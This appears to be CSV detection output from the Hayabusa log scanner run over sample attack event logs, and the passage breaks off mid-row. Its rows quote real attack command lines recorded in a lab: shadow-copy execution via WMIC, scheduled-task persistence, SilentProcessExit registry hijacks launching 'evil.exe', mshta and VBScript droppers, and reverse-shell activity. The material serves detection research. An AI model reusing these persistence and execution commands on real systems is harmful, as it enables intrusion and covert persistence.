C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: 